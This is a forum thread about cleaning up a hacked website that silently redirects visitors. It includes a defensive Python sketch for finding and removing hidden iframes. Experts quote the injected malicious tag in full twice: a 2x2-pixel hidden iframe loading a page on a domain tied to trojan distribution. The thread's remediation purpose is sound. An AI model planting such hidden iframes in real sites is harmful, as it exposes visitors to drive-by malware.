Solved

Hijacked site

Posted on 2013-01-17
9
447 Views
Last Modified: 2013-12-06
I am trying to sort out another issue on the following site, however since I've posted the question and link to it on Expert Exchange, it seems that the site has been hijacked and is re-directing to another site. The site in question is:

http://www.neuproessentials.co.uk

this is what a previous expert had to say ID: 38790188

Used a hack / slave AV machine and get redirected to:
http://macskako.com/hmod.html giving :

Forbidden
You don't have permission to access /hmod.html on this server.

Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.

Any help on how to correct this would be greatly appreciated.

Thanks
0
Comment
Question by:smythers
9 Comments
 
LVL 1

Expert Comment

by:SirLagz
ID: 38792295
That site is working for me at the moment.
Going to a Neupro patches site?
0
 

Author Comment

by:smythers
ID: 38792368
Yes, that's what it's meant to be doing but the experts who were trying to click on the link yesterday were getting redirected to some strange site and suggested I get it sorted here first. Thanks for taking a look.

I don't suppose you would be able to tell me why the video on this page will not work in IE 6, 7 or 8? That is my real problem.
0
 
LVL 38

Expert Comment

by:BillDL
ID: 38794281
I'm getting redirected to:
http://macskako.com/hmod.html
in Google Chrome but not in IE8.

Forbidden
You don't have permission to access /hmod.html on this server.
Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.

This comment is at 19:00 GMT, just as a reference.

Right at the end of your http://www.neuproessentials.co.uk after the tracking script you have this:

<!-- WiredMinds Piwik tracking END -->
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://macskako.com/hmod.html></iframe></body>
</html>

Did you place that there?
0
 
LVL 38

Expert Comment

by:BillDL
ID: 38794287
Now it loads the correct page in Chrome 2nd time around.

By the way, the domain macskako.com is registered in Budapest, Hungary.
http://www.dnsstuff.com/tools#whois/type=domain&&value=macskako.com&&
0
 
LVL 38

Accepted Solution

by:
BillDL earned 500 total points
ID: 38795825
Some Info:

http://evuln.com/tools/malware-scanner/www.neuproessentials.co.uk/

http://evuln.com/tools/malware-scanner/macskako.com/


Safe Browsing Diagnostic page for neuproessentials.co.uk valid at 07:00 GMT 19th January 2013
http://www.google.com/safebrowsing/diagnostic?site=neuproessentials.co.uk/

What is the current listing status for neuproessentials.co.uk?
This site is not currently listed as suspicious.
What happened when Google visited this site?
Google has not visited this site within the past 90 days.
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, neuproessentials.co.uk did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.

Safe Browsing Diagnostic page for macskako.com  valid at 07:00 GMT 19th January 2013
http://www.google.com/safebrowsing/diagnostic?site=macskako.com/

What is the current listing status for macskako.com?
This site is not currently listed as suspicious.

What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-11-17, and the last time suspicious content was found on this site was on 2012-11-17.
Malicious software includes 1 trojan(s).

This site was hosted on 1 network(s) including AS12301 (INVITEL).

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, macskako.com appeared to function as an intermediary for the infection of 8 site(s) including showyai.com, techinspecialed.com, geocaching.com.

Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.


Search all your website's pages for this tag:
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://macskako.com/hmod.html></iframe>

and delete from <iframe> through to and including </iframe> for each instance.
0
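Added example, not part of the original thread or any poster's code: a Python sketch of the search-and-delete step from the accepted answer, which parses each page so that the unquoted attributes in the injected tag are still read correctly. It flags off-site iframes that are only a few pixels in size and removes those pointing at a listed host; the function names, the 5-pixel threshold and the host player.example are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the page tail quoted in the thread, plus a legitimate
# embed that must survive the cleanup. player.example is a made-up host.
SAMPLE = """<html><body>
<iframe width="560" height="315" src="https://player.example/v/1"></iframe>
<!-- WiredMinds Piwik tracking END -->
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://macskako.com/hmod.html></iframe></body>
</html>
"""

class IframeAudit(HTMLParser):
    """Collect (line, host, width, height) for every iframe start tag."""
    def __init__(self):
        super().__init__()
        self.found = []
    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        host = urlparse(a.get("src") or "").hostname or ""
        self.found.append((self.getpos()[0], host, a.get("width"), a.get("height")))

def _px(value):
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None

def suspicious_iframes(html, site_hosts, max_px=5):
    """Off-site iframes too small for a visitor to see: (line, host) pairs."""
    p = IframeAudit()
    p.feed(html)
    out = []
    for line, host, w, h in p.found:
        tiny = any(v is not None and v <= max_px for v in (_px(w), _px(h)))
        if host and host not in site_hosts and tiny:
            out.append((line, host))
    return out

def strip_iframes(html, bad_hosts):
    """Delete from <iframe through </iframe> when src points at a listed host."""
    pat = re.compile(r"<iframe\b[^>]*>.*?</iframe\s*>", re.I | re.S)
    def repl(m):
        p = IframeAudit()
        p.feed(m.group(0))
        return "" if p.found and p.found[0][1] in bad_hosts else m.group(0)
    return pat.sub(repl, html)
```

Run `suspicious_iframes` over the text of every page and template on the server, and call `strip_iframes` only on files where it reports a hit, keeping a copy of the original file.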
 
LVL 38

Expert Comment

by:BillDL
ID: 39345902
Thanks younghv
0
 
LVL 38

Expert Comment

by:younghv
ID: 39346032
Hey BillDL -
Glad to help.
I've been on hiatus for several months, but will endeavor (endeavour) to keep these caught up better.
Vic
0
